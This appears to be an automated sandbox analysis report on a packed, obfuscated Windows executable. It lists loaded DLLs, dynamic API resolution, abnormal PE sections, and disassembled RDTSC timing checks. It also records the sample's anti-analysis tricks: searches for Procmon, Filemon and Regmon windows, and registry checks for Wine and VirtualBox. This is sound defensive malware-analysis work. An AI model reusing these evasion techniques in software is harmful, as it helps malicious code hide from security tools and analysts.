Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E63A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

1_2_00E63A50

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E5CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

1_2_00E5CAE0

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2XZNUO5Y.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1823232 > 1048576

Source: file.exe

Static PE information: Raw size of olrcobvx is bigger than: 0x100000 < 0x1a3400

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 1.2.file.exe.e40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;olrcobvx:EW;fyiwyewh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;olrcobvx:EW;fyiwyewh:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E66390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00E66390

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1c00db should be: 0x1c2717

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: olrcobvx
Source: file.exe	Static PE information: section name: fyiwyewh
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_012BC12D push edx; mov dword ptr [esp], eax	1_2_012BC173
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_01285932 push eax; mov dword ptr [esp], ecx	1_2_01285950
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_012F2931 push esi; mov dword ptr [esp], 253723A2h	1_2_012F295F
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push edx; mov dword ptr [esp], ebp	1_2_01209149
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push ebp; mov dword ptr [esp], ebx	1_2_0120914D
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push edi; mov dword ptr [esp], ebp	1_2_012091CD
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 34EFDCE6h; mov dword ptr [esp], esi	1_2_0120923E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push esi; mov dword ptr [esp], edx	1_2_012092AF
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push eax; mov dword ptr [esp], edx	1_2_012094D1
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 29B57B30h; mov dword ptr [esp], ecx	1_2_0120950B
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 428040A8h; mov dword ptr [esp], ebx	1_2_0120953D
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 723646FFh; mov dword ptr [esp], ecx	1_2_012095B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push ebx; mov dword ptr [esp], edi	1_2_012095D2
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push ebp; mov dword ptr [esp], esi	1_2_012095F6
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push eax; mov dword ptr [esp], ebp	1_2_012096E9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push edx; mov dword ptr [esp], 2F4CE6F6h	1_2_012097CA
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push esi; mov dword ptr [esp], ebp	1_2_012097D5
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push edi; mov dword ptr [esp], eax	1_2_012097E3
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push edi; mov dword ptr [esp], edx	1_2_01209800
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push edi; mov dword ptr [esp], ecx	1_2_0120983C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push esi; mov dword ptr [esp], edi	1_2_012098FE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push ebx; mov dword ptr [esp], esi	1_2_012099E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 11771006h; mov dword ptr [esp], ecx	1_2_01209A54
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push eax; mov dword ptr [esp], edx	1_2_01209AB9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push ebp; mov dword ptr [esp], 7EF6B9A8h	1_2_01209B40
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 7D638436h; mov dword ptr [esp], edi	1_2_01209C3C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push esi; mov dword ptr [esp], eax	1_2_01209C47
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push edi; mov dword ptr [esp], esi	1_2_01209C67
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 4A4D58E5h; mov dword ptr [esp], ebx	1_2_01209C78
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 75A0A2FCh; mov dword ptr [esp], ebx	1_2_01209CA8
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push esi; mov dword ptr [esp], edx	1_2_01209CD7

Source: file.exe

Static PE information: section name: olrcobvx entropy: 7.953678479680492

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

1_2_00E66390

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10901FA second address: 1090206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1090206 second address: 109020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109020A second address: 1090210 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1090210 second address: 1090215 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1211309 second address: 1211313 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1211313 second address: 121132A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F67787C018Dh 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121132A second address: 121132E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12178FD second address: 121791A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C0193h 0x00000009 jo 00007F67787C0186h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1217EAB second address: 1217EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1217EB1 second address: 1217EC9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F67787C018Eh 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F67787C0186h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F67787C0186h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121AD3B second address: 121AD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6778CEBE4Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121ADE0 second address: 121AE92 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F67787C018Ch 0x00000008 je 00007F67787C0186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jg 00007F67787C019Ah 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007F67787C0198h 0x00000021 pop eax 0x00000022 jmp 00007F67787C0196h 0x00000027 push 00000003h 0x00000029 call 00007F67787C018Fh 0x0000002e jmp 00007F67787C018Ah 0x00000033 pop esi 0x00000034 push 00000000h 0x00000036 pushad 0x00000037 jno 00007F67787C018Bh 0x0000003d sub dword ptr [ebp+122D3284h], ebx 0x00000043 popad 0x00000044 mov edi, esi 0x00000046 push 00000003h 0x00000048 mov esi, ecx 0x0000004a push BFC74118h 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F67787C0194h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121AE92 second address: 121AF0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F6778CEBE56h 0x0000000f popad 0x00000010 add dword ptr [esp], 0038BEE8h 0x00000017 jmp 00007F6778CEBE56h 0x0000001c lea ebx, dword ptr [ebp+1245EC3Ah] 0x00000022 mov dword ptr [ebp+122D1A42h], ebx 0x00000028 jng 00007F6778CEBE57h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B019 second address: 121B01F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B01F second address: 121B037 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jc 00007F6778CEBE50h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B037 second address: 121B064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F67787C0195h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push esi 0x00000013 jo 00007F67787C0186h 0x00000019 pop esi 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B064 second address: 121B094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop eax 0x00000007 lea ebx, dword ptr [ebp+1245EC43h] 0x0000000d mov dword ptr [ebp+122D1A64h], ecx 0x00000013 xchg eax, ebx 0x00000014 jmp 00007F6778CEBE55h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B094 second address: 121B098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B098 second address: 121B09E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B09E second address: 121B0A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B0A4 second address: 121B0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239004 second address: 123900A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12395F1 second address: 12395FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239751 second address: 1239756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239756 second address: 1239791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F6778CEBE52h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6778CEBE4Fh 0x00000014 jmp 00007F6778CEBE4Dh 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12398C1 second address: 12398CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F67787C0186h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12398CB second address: 12398F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F6778CEBE56h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F6778CEBE46h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239A64 second address: 1239A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239A6C second address: 1239A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F6778CEBE46h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239A7B second address: 1239AB4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b je 00007F67787C0186h 0x00000011 pop edx 0x00000012 popad 0x00000013 pushad 0x00000014 push edx 0x00000015 jc 00007F67787C0186h 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F67787C0199h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239C2B second address: 1239C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6778CEBE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239C35 second address: 1239C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239C39 second address: 1239C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6778CEBE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F6778CEBE46h 0x00000013 jbe 00007F6778CEBE46h 0x00000019 jmp 00007F6778CEBE4Eh 0x0000001e jmp 00007F6778CEBE4Bh 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6778CEBE50h 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239C80 second address: 1239C9B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F67787C018Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239F80 second address: 1239F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239F9D second address: 1239FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123A143 second address: 123A147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123A147 second address: 123A156 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F67787C0186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1212CF1 second address: 1212CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6778CEBE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1212CFB second address: 1212D25 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F67787C0186h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F67787C018Bh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F67787C018Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1212D25 second address: 1212D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1212D29 second address: 1212D33 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1212D33 second address: 1212D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1212D39 second address: 1212D5C instructions: 0x00000000 rdtsc 0x00000002 je 00007F67787C0186h 0x00000008 jo 00007F67787C0186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F67787C018Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123AA74 second address: 123AA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123AA78 second address: 123AA94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F67787C0196h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D48D second address: 123D493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D493 second address: 123D497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D604 second address: 123D60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D60C second address: 123D61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D61A second address: 123D624 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D624 second address: 123D65A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0197h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F67787C0191h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123C69C second address: 123C6A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F6778CEBE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D720 second address: 123D76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 jmp 00007F67787C0196h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push esi 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop esi 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f jmp 00007F67787C0193h 0x00000024 push eax 0x00000025 push edx 0x00000026 jnl 00007F67787C0186h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D90F second address: 123D91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6778CEBE46h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12469FC second address: 1246A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F67787C0186h 0x0000000a popad 0x0000000b push ebx 0x0000000c jmp 00007F67787C0196h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1245EC9 second address: 1245EEF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6778CEBE46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6778CEBE58h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1245EEF second address: 1245EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1245EF5 second address: 1245EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124604E second address: 1246052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
